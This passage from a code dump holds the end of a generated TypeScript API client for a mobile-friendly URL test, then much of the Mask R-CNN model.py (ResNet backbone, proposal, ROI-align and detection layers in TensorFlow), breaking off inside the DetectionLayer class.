callback as BodyResponseCallback<unknown>
);
} else {
return createAPIRequest<Schema$RunMobileFriendlyTestResponse>(
parameters
);
}
}
}
export interface Params$Resource$Urltestingtools$Mobilefriendlytest$Run
extends StandardParameters {
/**
* Request body metadata
*/
requestBody?: Schema$RunMobileFriendlyTestRequest;
}
}
model.py | """
Mask R-CNN
The main Mask R-CNN model implementation.
Copyright (c) 2017 Matterport, Inc.
Licensed under the MIT License (see LICENSE for details)
Written by Waleed Abdulla
"""
import os
import datetime
import re
import math
from collections import OrderedDict
import multiprocessing
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as KL
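# Note: the original Matterport code imported keras.engine as KE; TF2 removed
# keras.engine, so the custom layers below subclass keras.layers.Layer through
# the same alias.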
import tensorflow.keras.layers as KE
import tensorflow.keras.utils as KU
import tensorflow.keras.models as KM
from mrcnn import utils
# Requires TensorFlow 2.0+
from distutils.version import LooseVersion
assert LooseVersion(tf.__version__) >= LooseVersion("2.0")
############################################################
# Utility Functions
############################################################
def log(text, array=None):
"""Prints a text message. And, optionally, if a Numpy array is provided it
prints it's shape, min, and max values.
"""
if array is not None:
text = text.ljust(25)
text += ("shape: {:20} ".format(str(array.shape)))
if array.size:
text += ("min: {:10.5f} max: {:10.5f}".format(array.min(), array.max()))
else:
text += ("min: {:10} max: {:10}".format("", ""))
text += " {}".format(array.dtype)
print(text)
class BatchNorm(KL.BatchNormalization):
"""Extends the Keras BatchNormalization class to allow a central place
to make changes if needed.
    Batch normalization has a negative effect on training if batches are small,
    so this layer is often frozen (via a setting in the Config class) and
    functions as a linear layer.
"""
def call(self, inputs, training=None):
"""
Note about training values:
            None: Train BN layers. This is the normal mode.
            False: Freeze BN layers. Good when the batch size is small.
            True: (don't use). Sets the layer to training mode even when making inferences.
"""
return super(self.__class__, self).call(inputs, training=training)
def compute_backbone_shapes(config, image_shape):
"""Computes the width and height of each stage of the backbone network.
Returns:
[N, (height, width)]. Where N is the number of stages
"""
if callable(config.BACKBONE):
return config.COMPUTE_BACKBONE_SHAPE(image_shape)
# Currently supports ResNet only
assert config.BACKBONE in ["resnet50", "resnet101"]
return np.array(
[[int(math.ceil(image_shape[0] / stride)),
int(math.ceil(image_shape[1] / stride))]
for stride in config.BACKBONE_STRIDES])
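# Example (assuming the default BACKBONE_STRIDES = [4, 8, 16, 32, 64]): a
# 1024x1024 input image yields the stage shapes
# [[256, 256], [128, 128], [64, 64], [32, 32], [16, 16]].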
############################################################
# Resnet Graph
############################################################
# Code adapted from:
# https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py
def identity_block(input_tensor, kernel_size, filters, stage, block,
use_bias=True, train_bn=True):
"""The identity_block is the block that has no conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a',
use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c',
use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
x = KL.Add()([x, input_tensor])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def conv_block(input_tensor, kernel_size, filters, stage, block,
strides=(2, 2), use_bias=True, train_bn=True):
"""conv_block is the block that has a conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
    Note that from stage 3 on, the first conv layer in the main path has
    strides=(2, 2), and the shortcut has strides=(2, 2) as well.
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), strides=strides,
name=conv_name_base + '2a', use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base +
'2c', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides,
name=conv_name_base + '1', use_bias=use_bias)(input_tensor)
shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn)
x = KL.Add()([x, shortcut])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def resnet_graph(input_image, architecture, stage5=False, train_bn=True):
"""Build a ResNet graph.
architecture: Can be resnet50 or resnet101
stage5: Boolean. If False, stage5 of the network is not created
train_bn: Boolean. Train or freeze Batch Norm layers
"""
assert architecture in ["resnet50", "resnet101"]
# Stage 1
x = KL.ZeroPadding2D((3, 3))(input_image)
x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x)
x = BatchNorm(name='bn_conv1')(x, training=train_bn)
x = KL.Activation('relu')(x)
C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x)
# Stage 2
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn)
C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn)
# Stage 3
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn)
C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn)
# Stage 4
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn)
block_count = {"resnet50": 5, "resnet101": 22}[architecture]
for i in range(block_count):
x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn)
C4 = x
# Stage 5
if stage5:
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn)
C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn)
else:
C5 = None
return [C1, C2, C3, C4, C5]
############################################################
# Proposal Layer
############################################################
def apply_box_deltas_graph(boxes, deltas):
"""Applies the given deltas to the given boxes.
boxes: [N, (y1, x1, y2, x2)] boxes to update
deltas: [N, (dy, dx, log(dh), log(dw))] refinements to apply
"""
# Convert to y, x, h, w
height = boxes[:, 2] - boxes[:, 0]
width = boxes[:, 3] - boxes[:, 1]
center_y = boxes[:, 0] + 0.5 * height
center_x = boxes[:, 1] + 0.5 * width
# Apply deltas
center_y += deltas[:, 0] * height
center_x += deltas[:, 1] * width
height *= tf.exp(deltas[:, 2])
width *= tf.exp(deltas[:, 3])
# Convert back to y1, x1, y2, x2
y1 = center_y - 0.5 * height
x1 = center_x - 0.5 * width
y2 = y1 + height
x2 = x1 + width
result = tf.stack([y1, x1, y2, x2], axis=1, name="apply_box_deltas_out")
return result
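# Worked example (made-up numbers): a box (0.2, 0.2, 0.6, 0.6) with deltas
# (0.1, 0.0, log(1.5), 0.0) has height = width = 0.4 and center (0.4, 0.4).
# The center moves to y = 0.4 + 0.1 * 0.4 = 0.44, the height grows to
# 0.4 * 1.5 = 0.6, and the refined box is (0.14, 0.2, 0.74, 0.6).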
def clip_boxes_graph(boxes, window):
"""
boxes: [N, (y1, x1, y2, x2)]
window: [4] in the form y1, x1, y2, x2
"""
# Split
wy1, wx1, wy2, wx2 = tf.split(window, 4)
y1, x1, y2, x2 = tf.split(boxes, 4, axis=1)
# Clip
y1 = tf.maximum(tf.minimum(y1, wy2), wy1)
x1 = tf.maximum(tf.minimum(x1, wx2), wx1)
y2 = tf.maximum(tf.minimum(y2, wy2), wy1)
x2 = tf.maximum(tf.minimum(x2, wx2), wx1)
clipped = tf.concat([y1, x1, y2, x2], axis=1, name="clipped_boxes")
clipped.set_shape((clipped.shape[0], 4))
return clipped
class ProposalLayer(KE.Layer):
"""Receives anchor scores and selects a subset to pass as proposals
to the second stage. Filtering is done based on anchor scores and
non-max suppression to remove overlaps. It also applies bounding
box refinement deltas to anchors.
Inputs:
rpn_probs: [batch, num_anchors, (bg prob, fg prob)]
rpn_bbox: [batch, num_anchors, (dy, dx, log(dh), log(dw))]
anchors: [batch, num_anchors, (y1, x1, y2, x2)] anchors in normalized coordinates
Returns:
Proposals in normalized coordinates [batch, rois, (y1, x1, y2, x2)]
"""
def __init__(self, proposal_count, nms_threshold, config=None, **kwargs):
super(ProposalLayer, self).__init__(**kwargs)
self.config = config
self.proposal_count = proposal_count
self.nms_threshold = nms_threshold
def call(self, inputs):
        # Box scores. Use the foreground class confidence. [batch, num_anchors]
scores = inputs[0][:, :, 1]
# Box deltas [batch, num_rois, 4]
deltas = inputs[1]
deltas = deltas * np.reshape(self.config.RPN_BBOX_STD_DEV, [1, 1, 4])
# Anchors
anchors = inputs[2]
# Improve performance by trimming to top anchors by score
# and doing the rest on the smaller subset.
pre_nms_limit = tf.minimum(self.config.PRE_NMS_LIMIT, tf.shape(anchors)[1])
ix = tf.nn.top_k(scores, pre_nms_limit, sorted=True,
name="top_anchors").indices
scores = utils.batch_slice([scores, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
deltas = utils.batch_slice([deltas, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
pre_nms_anchors = utils.batch_slice([anchors, ix], lambda a, x: tf.gather(a, x),
self.config.IMAGES_PER_GPU,
names=["pre_nms_anchors"])
# Apply deltas to anchors to get refined anchors.
# [batch, N, (y1, x1, y2, x2)]
boxes = utils.batch_slice([pre_nms_anchors, deltas],
lambda x, y: apply_box_deltas_graph(x, y),
self.config.IMAGES_PER_GPU,
names=["refined_anchors"])
# Clip to image boundaries. Since we're in normalized coordinates,
# clip to 0..1 range. [batch, N, (y1, x1, y2, x2)]
window = np.array([0, 0, 1, 1], dtype=np.float32)
boxes = utils.batch_slice(boxes,
lambda x: clip_boxes_graph(x, window),
self.config.IMAGES_PER_GPU,
names=["refined_anchors_clipped"])
# Filter out small boxes
# According to Xinlei Chen's paper, this reduces detection accuracy
# for small objects, so we're skipping it.
# Non-max suppression
def nms(boxes, scores):
indices = tf.image.non_max_suppression(
boxes, scores, self.proposal_count,
self.nms_threshold, name="rpn_non_max_suppression")
proposals = tf.gather(boxes, indices)
# Pad if needed
padding = tf.maximum(self.proposal_count - tf.shape(proposals)[0], 0)
proposals = tf.pad(proposals, [(0, padding), (0, 0)])
return proposals
proposals = utils.batch_slice([boxes, scores], nms,
self.config.IMAGES_PER_GPU)
return proposals
def compute_output_shape(self, input_shape):
return (None, self.proposal_count, 4)
############################################################
# ROIAlign Layer
############################################################
def log2_graph(x):
"""Implementation of Log2. TF doesn't have a native implementation."""
return tf.math.log(x) / tf.math.log(2.0)
class PyramidROIAlign(KE.Layer):
"""Implements ROI Pooling on multiple levels of the feature pyramid.
Params:
- pool_shape: [pool_height, pool_width] of the output pooled regions. Usually [7, 7]
Inputs:
- boxes: [batch, num_boxes, (y1, x1, y2, x2)] in normalized
coordinates. Possibly padded with zeros if not enough
boxes to fill the array.
- image_meta: [batch, (meta data)] Image details. See compose_image_meta()
- feature_maps: List of feature maps from different levels of the pyramid.
Each is [batch, height, width, channels]
Output:
Pooled regions in the shape: [batch, num_boxes, pool_height, pool_width, channels].
    The width and height are those specified in the pool_shape in the layer
constructor.
"""
def __init__(self, pool_shape, **kwargs):
super(PyramidROIAlign, self).__init__(**kwargs)
self.pool_shape = tuple(pool_shape)
def call(self, inputs):
# Crop boxes [batch, num_boxes, (y1, x1, y2, x2)] in normalized coords
boxes = inputs[0]
# Image meta
# Holds details about the image. See compose_image_meta()
image_meta = inputs[1]
# Feature Maps. List of feature maps from different level of the
# feature pyramid. Each is [batch, height, width, channels]
feature_maps = inputs[2:]
# Assign each ROI to a level in the pyramid based on the ROI area.
y1, x1, y2, x2 = tf.split(boxes, 4, axis=2)
h = y2 - y1
w = x2 - x1
# Use shape of first image. Images in a batch must have the same size.
image_shape = parse_image_meta_graph(image_meta)['image_shape'][0]
# Equation 1 in the Feature Pyramid Networks paper. Account for
# the fact that our coordinates are normalized here.
# e.g. a 224x224 ROI (in pixels) maps to P4
image_area = tf.cast(image_shape[0] * image_shape[1], tf.float32)
roi_level = log2_graph(tf.sqrt(h * w) / (224.0 / tf.sqrt(image_area)))
roi_level = tf.minimum(5, tf.maximum(
2, 4 + tf.cast(tf.round(roi_level), tf.int32)))
roi_level = tf.squeeze(roi_level, 2)
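        # Sanity check of the mapping (hypothetical numbers): a 224x224-pixel
        # ROI in a 1024x1024 image has normalized sqrt(h*w) = 224/1024, and
        # 224.0/sqrt(image_area) = 224/1024 as well, so roi_level = log2(1) = 0
        # and the ROI maps to level 4 + 0 = P4, as in the FPN paper.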
# Loop through levels and apply ROI pooling to each. P2 to P5.
pooled = []
box_to_level = []
for i, level in enumerate(range(2, 6)):
ix = tf.where(tf.equal(roi_level, level))
level_boxes = tf.gather_nd(boxes, ix)
# Box indices for crop_and_resize.
box_indices = tf.cast(ix[:, 0], tf.int32)
# Keep track of which box is mapped to which level
box_to_level.append(ix)
            # Stop gradient propagation to the ROI proposals
level_boxes = tf.stop_gradient(level_boxes)
box_indices = tf.stop_gradient(box_indices)
# Crop and Resize
# From Mask R-CNN paper: "We sample four regular locations, so
# that we can evaluate either max or average pooling. In fact,
# interpolating only a single value at each bin center (without
# pooling) is nearly as effective."
#
            # Here we use the simplified approach of a single value per bin,
            # which is how it's done by tf.image.crop_and_resize()
# Result: [batch * num_boxes, pool_height, pool_width, channels]
pooled.append(tf.image.crop_and_resize(
feature_maps[i], level_boxes, box_indices, self.pool_shape,
method="bilinear"))
# Pack pooled features into one tensor
pooled = tf.concat(pooled, axis=0)
# Pack box_to_level mapping into one array and add another
# column representing the order of pooled boxes
box_to_level = tf.concat(box_to_level, axis=0)
box_range = tf.expand_dims(tf.range(tf.shape(box_to_level)[0]), 1)
box_to_level = tf.concat([tf.cast(box_to_level, tf.int32), box_range],
axis=1)
# Rearrange pooled features to match the order of the original boxes
# Sort box_to_level by batch then box index
# TF doesn't have a way to sort by two columns, so merge them and sort.
sorting_tensor = box_to_level[:, 0] * 100000 + box_to_level[:, 1]
ix = tf.nn.top_k(sorting_tensor, k=tf.shape(
box_to_level)[0]).indices[::-1]
ix = tf.gather(box_to_level[:, 2], ix)
pooled = tf.gather(pooled, ix)
# Re-add the batch dimension
shape = tf.concat([tf.shape(boxes)[:2], tf.shape(pooled)[1:]], axis=0)
pooled = tf.reshape(pooled, shape)
return pooled
def compute_output_shape(self, input_shape):
return input_shape[0][:2] + self.pool_shape + (input_shape[2][-1], )
############################################################
# Detection Target Layer
############################################################
def overlaps_graph(boxes1, boxes2):
"""Computes IoU overlaps between two sets of boxes.
boxes1, boxes2: [N, (y1, x1, y2, x2)].
"""
# 1. Tile boxes2 and repeat boxes1. This allows us to compare
# every boxes1 against every boxes2 without loops.
# TF doesn't have an equivalent to np.repeat() so simulate it
# using tf.tile() and tf.reshape.
b1 = tf.reshape(tf.tile(tf.expand_dims(boxes1, 1),
[1, 1, tf.shape(boxes2)[0]]), [-1, 4])
b2 = tf.tile(boxes2, [tf.shape(boxes1)[0], 1])
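    # Shape walk-through (hypothetical N=2 boxes1 rows, M=3 boxes2 rows):
    # b1 is [6, 4] with each boxes1 row repeated 3 times consecutively and
    # b2 is [6, 4] with boxes2 stacked twice, so row i*M + j pairs
    # boxes1[i] with boxes2[j].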
# 2. Compute intersections
b1_y1, b1_x1, b1_y2, b1_x2 = tf.split(b1, 4, axis=1)
b2_y1, b2_x1, b2_y2, b2_x2 = tf.split(b2, 4, axis=1)
y1 = tf.maximum(b1_y1, b2_y1)
x1 = tf.maximum(b1_x1, b2_x1)
y2 = tf.minimum(b1_y2, b2_y2)
x2 = tf.minimum(b1_x2, b2_x2)
intersection = tf.maximum(x2 - x1, 0) * tf.maximum(y2 - y1, 0)
# 3. Compute unions
b1_area = (b1_y2 - b1_y1) * (b1_x2 - b1_x1)
b2_area = (b2_y2 - b2_y1) * (b2_x2 - b2_x1)
union = b1_area + b2_area - intersection
# 4. Compute IoU and reshape to [boxes1, boxes2]
iou = intersection / union
overlaps = tf.reshape(iou, [tf.shape(boxes1)[0], tf.shape(boxes2)[0]])
return overlaps
def detection_targets_graph(proposals, gt_class_ids, gt_boxes, gt_masks, config):
"""Generates detection targets for one image. Subsamples proposals and
generates target class IDs, bounding box deltas, and masks for each.
Inputs:
proposals: [POST_NMS_ROIS_TRAINING, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [MAX_GT_INSTANCES] int class IDs
gt_boxes: [MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates.
gt_masks: [height, width, MAX_GT_INSTANCES] of boolean type.
Returns: Target ROIs and corresponding class IDs, bounding box shifts,
and masks.
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates
class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. Zero padded.
deltas: [TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw))]
masks: [TRAIN_ROIS_PER_IMAGE, height, width]. Masks cropped to bbox
boundaries and resized to neural network output size.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
# Assertions
asserts = [
tf.Assert(tf.greater(tf.shape(proposals)[0], 0), [proposals],
name="roi_assertion"),
]
with tf.control_dependencies(asserts):
proposals = tf.identity(proposals)
# Remove zero padding
proposals, _ = trim_zeros_graph(proposals, name="trim_proposals")
gt_boxes, non_zeros = trim_zeros_graph(gt_boxes, name="trim_gt_boxes")
gt_class_ids = tf.boolean_mask(gt_class_ids, non_zeros,
name="trim_gt_class_ids")
gt_masks = tf.gather(gt_masks, tf.where(non_zeros)[:, 0], axis=2,
name="trim_gt_masks")
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = tf.where(gt_class_ids < 0)[:, 0]
non_crowd_ix = tf.where(gt_class_ids > 0)[:, 0]
crowd_boxes = tf.gather(gt_boxes, crowd_ix)
gt_class_ids = tf.gather(gt_class_ids, non_crowd_ix)
gt_boxes = tf.gather(gt_boxes, non_crowd_ix)
gt_masks = tf.gather(gt_masks, non_crowd_ix, axis=2)
# Compute overlaps matrix [proposals, gt_boxes]
overlaps = overlaps_graph(proposals, gt_boxes)
# Compute overlaps with crowd boxes [proposals, crowd_boxes]
crowd_overlaps = overlaps_graph(proposals, crowd_boxes)
crowd_iou_max = tf.reduce_max(crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
# Determine positive and negative ROIs
roi_iou_max = tf.reduce_max(overlaps, axis=1)
# 1. Positive ROIs are those with >= 0.5 IoU with a GT box
positive_roi_bool = (roi_iou_max >= 0.5)
positive_indices = tf.where(positive_roi_bool)[:, 0]
# 2. Negative ROIs are those with < 0.5 with every GT box. Skip crowds.
negative_indices = tf.where(tf.logical_and(roi_iou_max < 0.5, no_crowd_bool))[:, 0]
# Subsample ROIs. Aim for 33% positive
# Positive ROIs
positive_count = int(config.TRAIN_ROIS_PER_IMAGE *
config.ROI_POSITIVE_RATIO)
positive_indices = tf.random.shuffle(positive_indices)[:positive_count]
positive_count = tf.shape(positive_indices)[0]
# Negative ROIs. Add enough to maintain positive:negative ratio.
r = 1.0 / config.ROI_POSITIVE_RATIO
negative_count = tf.cast(r * tf.cast(positive_count, tf.float32), tf.int32) - positive_count
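    # With the typical TRAIN_ROIS_PER_IMAGE = 200 and ROI_POSITIVE_RATIO = 0.33,
    # positive_count is at most int(200 * 0.33) = 66 and negative_count is
    # roughly 200 - 66 = 134, assuming enough proposals of each kind exist.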
negative_indices = tf.random.shuffle(negative_indices)[:negative_count]
# Gather selected ROIs
positive_rois = tf.gather(proposals, positive_indices)
negative_rois = tf.gather(proposals, negative_indices)
# Assign positive ROIs to GT boxes.
positive_overlaps = tf.gather(overlaps, positive_indices)
roi_gt_box_assignment = tf.cond(
tf.greater(tf.shape(positive_overlaps)[1], 0),
true_fn=lambda: tf.argmax(positive_overlaps, axis=1),
false_fn=lambda: tf.cast(tf.constant([]), tf.int64)
)
roi_gt_boxes = tf.gather(gt_boxes, roi_gt_box_assignment)
roi_gt_class_ids = tf.gather(gt_class_ids, roi_gt_box_assignment)
# Compute bbox refinement for positive ROIs
deltas = utils.box_refinement_graph(positive_rois, roi_gt_boxes)
deltas /= config.BBOX_STD_DEV
# Assign positive ROIs to GT masks
# Permute masks to [N, height, width, 1]
transposed_masks = tf.expand_dims(tf.transpose(gt_masks, [2, 0, 1]), -1)
# Pick the right mask for each ROI
roi_masks = tf.gather(transposed_masks, roi_gt_box_assignment)
# Compute mask targets
boxes = positive_rois
if config.USE_MINI_MASK:
# Transform ROI coordinates from normalized image space
# to normalized mini-mask space.
y1, x1, y2, x2 = tf.split(positive_rois, 4, axis=1)
gt_y1, gt_x1, gt_y2, gt_x2 = tf.split(roi_gt_boxes, 4, axis=1)
gt_h = gt_y2 - gt_y1
gt_w = gt_x2 - gt_x1
y1 = (y1 - gt_y1) / gt_h
x1 = (x1 - gt_x1) / gt_w
y2 = (y2 - gt_y1) / gt_h
x2 = (x2 - gt_x1) / gt_w
boxes = tf.concat([y1, x1, y2, x2], 1)
box_ids = tf.range(0, tf.shape(roi_masks)[0])
masks = tf.image.crop_and_resize(tf.cast(roi_masks, tf.float32), boxes,
box_ids,
config.MASK_SHAPE)
# Remove the extra dimension from masks.
masks = tf.squeeze(masks, axis=3)
# Threshold mask pixels at 0.5 to have GT masks be 0 or 1 to use with
# binary cross entropy loss.
masks = tf.round(masks)
# Append negative ROIs and pad bbox deltas and masks that
# are not used for negative ROIs with zeros.
rois = tf.concat([positive_rois, negative_rois], axis=0)
N = tf.shape(negative_rois)[0]
P = tf.maximum(config.TRAIN_ROIS_PER_IMAGE - tf.shape(rois)[0], 0)
rois = tf.pad(rois, [(0, P), (0, 0)])
roi_gt_boxes = tf.pad(roi_gt_boxes, [(0, N + P), (0, 0)])
roi_gt_class_ids = tf.pad(roi_gt_class_ids, [(0, N + P)])
deltas = tf.pad(deltas, [(0, N + P), (0, 0)])
    masks = tf.pad(masks, [(0, N + P), (0, 0), (0, 0)])
return rois, roi_gt_class_ids, deltas, masks
class DetectionTargetLayer(KE.Layer):
"""Subsamples proposals and generates target box refinement, class_ids,
and masks for each.
Inputs:
proposals: [batch, N, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs.
gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized
coordinates.
gt_masks: [batch, height, width, MAX_GT_INSTANCES] of boolean type
Returns: Target ROIs and corresponding class IDs, bounding box shifts,
and masks.
rois: [batch, TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized
coordinates
target_class_ids: [batch, TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
target_deltas: [batch, TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw)]
target_mask: [batch, TRAIN_ROIS_PER_IMAGE, height, width]
Masks cropped to bbox boundaries and resized to neural
network output size.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
def __init__(self, config, **kwargs):
super(DetectionTargetLayer, self).__init__(**kwargs)
self.config = config
def call(self, inputs):
proposals = inputs[0]
gt_class_ids = inputs[1]
gt_boxes = inputs[2]
gt_masks = inputs[3]
# Slice the batch and run a graph for each slice
# TODO: Rename target_bbox to target_deltas for clarity
names = ["rois", "target_class_ids", "target_bbox", "target_mask"]
outputs = utils.batch_slice(
[proposals, gt_class_ids, gt_boxes, gt_masks],
lambda w, x, y, z: detection_targets_graph(
w, x, y, z, self.config),
self.config.IMAGES_PER_GPU, names=names)
return outputs
def compute_output_shape(self, input_shape):
return [
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # rois
(None, self.config.TRAIN_ROIS_PER_IMAGE), # class_ids
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # deltas
(None, self.config.TRAIN_ROIS_PER_IMAGE, self.config.MASK_SHAPE[0],
self.config.MASK_SHAPE[1]) # masks
]
def compute_mask(self, inputs, mask=None):
return [None, None, None, None]
############################################################
# Detection Layer
############################################################
def refine_detections_graph(rois, probs, deltas, window, config):
"""Refine classified proposals and filter overlaps and return final
detections.
Inputs:
rois: [N, (y1, x1, y2, x2)] in normalized coordinates
probs: [N, num_classes]. Class probabilities.
deltas: [N, num_classes, (dy, dx, log(dh), log(dw))]. Class-specific
bounding box deltas.
window: (y1, x1, y2, x2) in normalized coordinates. The part of the image
that contains the image excluding the padding.
Returns detections shaped: [num_detections, (y1, x1, y2, x2, class_id, score)] where
coordinates are normalized.
"""
# Class IDs per ROI
class_ids = tf.argmax(probs, axis=1, output_type=tf.int32)
# Class probability of the top class of each ROI
indices = tf.stack([tf.range(tf.shape(probs)[0]), class_ids], axis=1)
class_scores = tf.gather_nd(probs, indices)
# Class-specific bounding box deltas
deltas_specific = tf.gather_nd(deltas, indices)
# Apply bounding box deltas
# Shape: [boxes, (y1, x1, y2, x2)] in normalized coordinates
refined_rois = apply_box_deltas_graph(
rois, deltas_specific * config.BBOX_STD_DEV)
# Clip boxes to image window
refined_rois = clip_boxes_graph(refined_rois, window)
# TODO: Filter out boxes with zero area
# Filter out background boxes
keep = tf.where(class_ids > 0)[:, 0]
# Filter out low confidence boxes
if config.DETECTION_MIN_CONFIDENCE:
conf_keep = tf.where(class_scores >= config.DETECTION_MIN_CONFIDENCE)[:, 0]
keep = tf.sets.intersection(tf.expand_dims(keep, 0),
tf.expand_dims(conf_keep, 0))
keep = tf.sparse.to_dense(keep)[0]
# Apply per-class NMS
# 1. Prepare variables
pre_nms_class_ids = tf.gather(class_ids, keep)
pre_nms_scores = tf.gather(class_scores, keep)
pre_nms_rois = tf.gather(refined_rois, keep)
unique_pre_nms_class_ids = tf.unique(pre_nms_class_ids)[0]
def nms_keep_map(class_id):
"""Apply Non-Maximum Suppression on ROIs of the given class."""
# Indices of ROIs of the given class
ixs = tf.where(tf.equal(pre_nms_class_ids, class_id))[:, 0]
# Apply NMS
class_keep = tf.image.non_max_suppression(
tf.gather(pre_nms_rois, ixs),
tf.gather(pre_nms_scores, ixs),
max_output_size=config.DETECTION_MAX_INSTANCES,
iou_threshold=config.DETECTION_NMS_THRESHOLD)
# Map indices
class_keep = tf.gather(keep, tf.gather(ixs, class_keep))
# Pad with -1 so returned tensors have the same shape
gap = config.DETECTION_MAX_INSTANCES - tf.shape(class_keep)[0]
class_keep = tf.pad(class_keep, [(0, gap)],
mode='CONSTANT', constant_values=-1)
# Set shape so map_fn() can infer result shape
class_keep.set_shape([config.DETECTION_MAX_INSTANCES])
return class_keep
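    # Each per-class result is padded with -1 up to DETECTION_MAX_INSTANCES
    # so that map_fn gets tensors of one static shape; the -1 entries are
    # stripped again right after the map below.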
# 2. Map over class IDs
nms_keep = tf.map_fn(nms_keep_map, unique_pre_nms_class_ids,
dtype=tf.int64)
# 3. Merge results into one list, and remove -1 padding
nms_keep = tf.reshape(nms_keep, [-1])
nms_keep = tf.gather(nms_keep, tf.where(nms_keep > -1)[:, 0])
# 4. Compute intersection between keep and nms_keep
keep = tf.sets.intersection(tf.expand_dims(keep, 0),
tf.expand_dims(nms_keep, 0))
keep = tf.sparse.to_dense(keep)[0]
# Keep top detections
roi_count = config.DETECTION_MAX_INSTANCES
class_scores_keep = tf.gather(class_scores, keep)
num_keep = tf.minimum(tf.shape(class_scores_keep)[0], roi_count)
top_ids = tf.nn.top_k(class_scores_keep, k=num_keep, sorted=True)[1]
keep = tf.gather(keep, top_ids)
# Arrange output as [N, (y1, x1, y2, x2, class_id, score)]
# Coordinates are normalized.
detections = tf.concat([
tf.gather(refined_rois, keep),
tf.cast(tf.gather(class_ids, keep), tf.float32)[..., tf.newaxis],
tf.gather(class_scores, keep)[..., tf.newaxis]
], axis=1)
# Pad with zeros if detections < DETECTION_MAX_INSTANCES
gap = config.DETECTION_MAX_INSTANCES - tf.shape(detections)[0]
detections = tf.pad(detections, [(0, gap), (0, 0)], "CONSTANT")
return detections
class DetectionLayer(KE.Layer):
"""Takes classified proposal boxes and their bounding box deltas and
returns the final detection boxes.
Returns:
[batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] where
coordinates are normalized.
